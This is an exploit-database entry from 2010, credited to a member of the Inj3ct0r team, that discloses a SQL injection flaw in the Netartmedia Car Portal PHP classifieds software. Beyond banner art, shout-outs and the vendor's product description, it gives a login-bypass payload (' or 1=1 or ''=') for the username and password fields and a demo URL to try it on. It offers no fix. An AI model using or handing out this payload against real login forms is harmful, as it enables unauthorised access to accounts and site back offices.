Netartmedia Car Portal SQL Injection Vulnerability

2010-06-28T00:00:00
ID 1337DAY-ID-12914
Type zdt
Reporter Sid3^effects
Modified 2010-06-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==================================================
Netartmedia Car Portal SQL Injection Vulnerability
==================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : Netartmedia Car Portal SQLi Vulnerability
Date : june, 28 2010
Critical Level     : HIGH
Vendor Url : http://www.netartmedia.net/carsportal/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
Car Portal is a software solution for running auto classifieds portals. It provides functionality for the private sellers to signup, list

their car for sale and make changes in their ads online using the private sellers administration space. The product provides special

functionalities for the dealers to work and manage multiple ads. An affiliate functionality is also included, affiliate partners may signup

and earn commissions on all the sales done through their links. The product comes with a very powerful back office application for the

administrators, allowing them not only to manage the cars portal settings, the dealers, affiliates etc. but also providing them full control

over the website, its structure and content, statistics, search engines functionality and many others.

What technology is used for Car Portal?
Car Portal is a web solution written in PHP and it uses a MySQL database for storing the data. In order to run it on your server/hosting

package you need both PHP and MySQL running and also mod_rewrite (if you plan to use the functionality for SEO links, it can be turned off if

this module isn't present).

###############################################################################################################

Xploit: SQLi VUlnerability

 
use this sql combo both in username and password ' or 1=1 or ''=' in the login section

DEMO URL : http://www.wscreator.com/autoportal3/index.php

###############################################################################################################
# 0day no more
# Sid3^effects 



#  0day.today [2018-01-04]  #